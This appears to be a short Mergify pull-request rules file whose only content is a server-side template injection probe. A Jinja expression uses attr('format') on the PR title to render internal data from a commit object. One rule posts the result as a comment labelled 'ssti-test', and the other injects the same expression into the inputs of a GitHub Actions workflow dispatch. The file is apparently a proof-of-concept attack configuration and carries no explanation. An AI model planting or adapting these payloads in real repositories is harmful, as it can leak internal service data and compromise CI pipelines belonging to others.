pull_request_rules:
  - name: test-comment
    conditions:
      - base=main
    actions:
      comment:
        message: "ssti-test: {{ (title|attr('format'))(commits[0]) }}"
  - name: dispatch-with-pr-data
    conditions:
      - base=main
    actions:
      github_actions:
        workflow:
          dispatch:
            - workflow: ci.yml
              inputs:
                author_data: "{{ (title|attr('format'))(commits[0]) }}"
